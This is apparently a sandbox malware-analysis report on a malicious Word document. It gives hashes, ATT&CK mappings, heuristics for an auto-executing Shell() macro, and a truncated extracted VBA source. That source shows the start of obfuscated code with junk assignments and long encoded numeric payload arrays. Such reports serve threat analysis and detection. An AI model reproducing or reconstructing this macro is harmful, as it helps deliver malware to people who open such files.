Office (OLE) malware analysis — malicious · 40df88dd524ca53d

MALICIOUS

Office (OLE)

224.0 KB Created: 2015-12-08 21:48:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 5646497849313cf0346924c9b476512c SHA-1: f23cd22b7231cf756ae43fa00d6813bc55ff6c7f SHA-256: 40df88dd524ca53d4e6caa27f2846c328eacb8b4148eb1546ff297e7f398c8d1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms this is triggered by the Document_Open auto-execution macro. This suggests the macro is designed to execute a command, likely to download and run a second-stage payload. No specific family could be identified.

Heuristics 7

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37580 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37580 bytes
SHA-256: `a863c4208b639ff09ae6312390f0172533429f970a7dee992ae5de1f1c921867`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function UQ2gy25Ljqb Lib "GL1n0u4ehQ9WcMym" Alias "WMnnNQem" (ByVal Nvympzz6j8 As String, GRmTF99l6feLG As Long) As Long #Else Private Declare Function UQ2gy25Ljqb lib "GL1n0u4ehQ9WcMym" Alias "WMnnNQem"(byval Nvympzz6j8 as String, GRmTF99l6feLG as Long ) as Long #End If Sub Jx9MAmZI1YY() DrpRx = 32 YrxWDtg3 = 18 + 87 + 52 + 57 On Error Resume Next CiddIq = 25 RceoYIjNnqU = 71 + 6 + 55 + 6 Dim SfO0a3ua0qeB As String, Yq0KtpaIOEb() As String, UP6g2iLcl As Integer Q9LWJq56QUe = 30 Qbn8Gbnmk = 10 + 70 + 61 + 62 SfO0a3ua0qeB = SfO0a3ua0qeB & "239,240,202,226,237,202,20,20,118,61,89,64,8,123,65,57,62,40,69,2,3,54,40,1,110,114,80,12,22,30,45,99,60,102,115,103,69,85,105,74,5,11,47,56,88,38,125,34,25,71,117,84,59,17,44,36,45,99,35,54,22,30,51,42,98,67,97,67,57,7,119,70,94,112,118,76,37,32,27,15,116,81,1,96,69,105,67,119,99,69,108,56,96,23,4,25,7,21,68,127,102,67,91,98,80,81,119,61,73,9,86,18,80,28,56,96,28,35,37,49,31,13,76,72,91,125,110,28,233,174,132,175,227,238,201,247,245,228,214,152,233,216,221,192,247,243,197,246,244,248,213,144,235,219,203,187,178,166,209,146,169,180,134,198,154,172,167,145,220,183,139,134,210,175,245,188,163,177,130,129,186,170,173,183,209,212,239,206,130,173,237,147,197,207,254,208,224,227,195,166,170,227,247,199,190,212,129,183,187,173,149,192,209,216,133,132,175,191,133,169,163,164,139,204,147,193,243" XVbMrEtK3pd = 58 KikG8gXEuHqMf = 51 + 73 + 6 + 34 SfO0a3ua0qeB = SfO0a3ua0qeB & ",196,245,250,192,214,230,132,160,248,235,253,249,218,205,209,232,228,221,215,204,253,222,245,32,45,54,86,56,35,107,127,65,16,126,71,65,82,109,127,71,0,34,56,13,30,97,81,39,56,26,58,32,43,29,55,20,101,59,23,206,192,166,226,140,136,123,106,93,26,121,58,39,56,61,40,11,17,97,15,53,66,16,18,29,50,125,112,83,107,96,114,124,50,69,115,119,106,65,68,114,76,74,70,105,44,93,109,97,16,27,1,123,35,8,24,109,42,73,19,24,109,18,37,71,107,109,87,66,50,32,106,75,105,47,61,1,78,112,108,68,22,106,94,73,17,89,96,125,110,80,99,82,4,68,75,86,86,23,101,35,117,95,68,110,59,104,83,91,96,95,120,41,67,106,15,47,15,31,113,60,80,105,67,65,12,25,123,129,195,169,140,131,183,175,182,147,132,243,254,205,136,147,196,193,213,247,148,175,163,145,176,132,240,136,142,223,217,228,233,253,196,203,206,241,220,176,140,189,151,20" W1C5oj4 = 92 OzmVYN = 48 + 8 + 4 + 68 SfO0a3ua0qeB = SfO0a3ua0qeB & "5,192,227,217,211,194,236,162,212,229,231,250,209,216,239,220,218,214,242,185,205,253,145,225,236,248,139,207,189,252,210,152,255,250,219,219,249,219,147,180,200,196,215,141,239,230,218,244,169,239,199,210,185,178,210,227,221,231,238,216,141,145,197,192,147,244,215,166,137,249,206,185,149,252,238,243,250,131,214,141,97,72,80,25,72,99,43,104,105,10,25,114,50,86,56,95,56,11,75,97,103,98,69,103,115,34,40,58,18,9,54,11,48,7,75,19,142,85,67,76,108,124,70,2,60,36,11,98,121,57,57,4,36,96,69,125,101,103,76,4,108,69,76,111,70,66,116,65,69,75,97,46,90,104,122,27,15,12,96,36,32,11,47,111,55,37,13,104,28,24,30,89,75,83,43,33,85,97,68,101,77,114,98,104,97,115,20,54,91,71,115,3,32,69,85,39,47,119,89,47,68,12,113,16,56,56,6,23,104,30,82,101,6,54,85,56,25,15,61,26,100,17,94,119,19,32,68,35,1,21,94,14,7" XA2WgoG = 23 QdYhfR2 = 18 + 6 + 41 + 35 SfO0a3ua0qeB = SfO0a3ua0qeB & ",7,58,124,29,45,73,215,128,231,170,244,139,250,182,136,239,218,202,216,242,234,216,231,159,253,200,135,230,164,177,180,179,135,174,234,244,250,193,177,208,226,149,152,210,158,138,205,223,199,228,170,220,238,252,246,178,221,175,185,167,150,163,216,131,183,253,153,141,176,145,221,170,178,148,206,165,132,159,140,188,172,132,162,166,181,137,195,171,144,150,132,176,160,154,206,247,227,140,170,189,210,202,253,255,148,177,129,255,241,228,176,208,219,233,193,158,218,244,255,148,216,193,179,194,221,232,249,150,112,127,122,9,91,105,105,20,9,6,33,116,39,59,124,107,101,92,29,9,5,72,59,19,29,3 ... (truncated)

SHA-256: a863c4208b639ff09ae6312390f0172533429f970a7dee992ae5de1f1c921867

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function UQ2gy25Ljqb Lib "GL1n0u4ehQ9WcMym" Alias "WMnnNQem" (ByVal Nvympzz6j8 As String, GRmTF99l6feLG As Long) As Long
#Else
Private Declare Function UQ2gy25Ljqb lib "GL1n0u4ehQ9WcMym" Alias "WMnnNQem"(byval Nvympzz6j8 as String, GRmTF99l6feLG as Long ) as Long
#End If
Sub Jx9MAmZI1YY()
DrpRx = 32
YrxWDtg3 = 18 + 87 + 52 + 57
On Error Resume Next
CiddIq = 25
RceoYIjNnqU = 71 + 6 + 55 + 6
Dim SfO0a3ua0qeB As String, Yq0KtpaIOEb() As String, UP6g2iLcl As Integer
Q9LWJq56QUe = 30
Qbn8Gbnmk = 10 + 70 + 61 + 62
SfO0a3ua0qeB = SfO0a3ua0qeB & "239,240,202,226,237,202,20,20,118,61,89,64,8,123,65,57,62,40,69,2,3,54,40,1,110,114,80,12,22,30,45,99,60,102,115,103,69,85,105,74,5,11,47,56,88,38,125,34,25,71,117,84,59,17,44,36,45,99,35,54,22,30,51,42,98,67,97,67,57,7,119,70,94,112,118,76,37,32,27,15,116,81,1,96,69,105,67,119,99,69,108,56,96,23,4,25,7,21,68,127,102,67,91,98,80,81,119,61,73,9,86,18,80,28,56,96,28,35,37,49,31,13,76,72,91,125,110,28,233,174,132,175,227,238,201,247,245,228,214,152,233,216,221,192,247,243,197,246,244,248,213,144,235,219,203,187,178,166,209,146,169,180,134,198,154,172,167,145,220,183,139,134,210,175,245,188,163,177,130,129,186,170,173,183,209,212,239,206,130,173,237,147,197,207,254,208,224,227,195,166,170,227,247,199,190,212,129,183,187,173,149,192,209,216,133,132,175,191,133,169,163,164,139,204,147,193,243"
XVbMrEtK3pd = 58
KikG8gXEuHqMf = 51 + 73 + 6 + 34
SfO0a3ua0qeB = SfO0a3ua0qeB & ",196,245,250,192,214,230,132,160,248,235,253,249,218,205,209,232,228,221,215,204,253,222,245,32,45,54,86,56,35,107,127,65,16,126,71,65,82,109,127,71,0,34,56,13,30,97,81,39,56,26,58,32,43,29,55,20,101,59,23,206,192,166,226,140,136,123,106,93,26,121,58,39,56,61,40,11,17,97,15,53,66,16,18,29,50,125,112,83,107,96,114,124,50,69,115,119,106,65,68,114,76,74,70,105,44,93,109,97,16,27,1,123,35,8,24,109,42,73,19,24,109,18,37,71,107,109,87,66,50,32,106,75,105,47,61,1,78,112,108,68,22,106,94,73,17,89,96,125,110,80,99,82,4,68,75,86,86,23,101,35,117,95,68,110,59,104,83,91,96,95,120,41,67,106,15,47,15,31,113,60,80,105,67,65,12,25,123,129,195,169,140,131,183,175,182,147,132,243,254,205,136,147,196,193,213,247,148,175,163,145,176,132,240,136,142,223,217,228,233,253,196,203,206,241,220,176,140,189,151,20"
W1C5oj4 = 92
OzmVYN = 48 + 8 + 4 + 68
SfO0a3ua0qeB = SfO0a3ua0qeB & "5,192,227,217,211,194,236,162,212,229,231,250,209,216,239,220,218,214,242,185,205,253,145,225,236,248,139,207,189,252,210,152,255,250,219,219,249,219,147,180,200,196,215,141,239,230,218,244,169,239,199,210,185,178,210,227,221,231,238,216,141,145,197,192,147,244,215,166,137,249,206,185,149,252,238,243,250,131,214,141,97,72,80,25,72,99,43,104,105,10,25,114,50,86,56,95,56,11,75,97,103,98,69,103,115,34,40,58,18,9,54,11,48,7,75,19,142,85,67,76,108,124,70,2,60,36,11,98,121,57,57,4,36,96,69,125,101,103,76,4,108,69,76,111,70,66,116,65,69,75,97,46,90,104,122,27,15,12,96,36,32,11,47,111,55,37,13,104,28,24,30,89,75,83,43,33,85,97,68,101,77,114,98,104,97,115,20,54,91,71,115,3,32,69,85,39,47,119,89,47,68,12,113,16,56,56,6,23,104,30,82,101,6,54,85,56,25,15,61,26,100,17,94,119,19,32,68,35,1,21,94,14,7"
XA2WgoG = 23
QdYhfR2 = 18 + 6 + 41 + 35
SfO0a3ua0qeB = SfO0a3ua0qeB & ",7,58,124,29,45,73,215,128,231,170,244,139,250,182,136,239,218,202,216,242,234,216,231,159,253,200,135,230,164,177,180,179,135,174,234,244,250,193,177,208,226,149,152,210,158,138,205,223,199,228,170,220,238,252,246,178,221,175,185,167,150,163,216,131,183,253,153,141,176,145,221,170,178,148,206,165,132,159,140,188,172,132,162,166,181,137,195,171,144,150,132,176,160,154,206,247,227,140,170,189,210,202,253,255,148,177,129,255,241,228,176,208,219,233,193,158,218,244,255,148,216,193,179,194,221,232,249,150,112,127,122,9,91,105,105,20,9,6,33,116,39,59,124,107,101,92,29,9,5,72,59,19,29,3
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.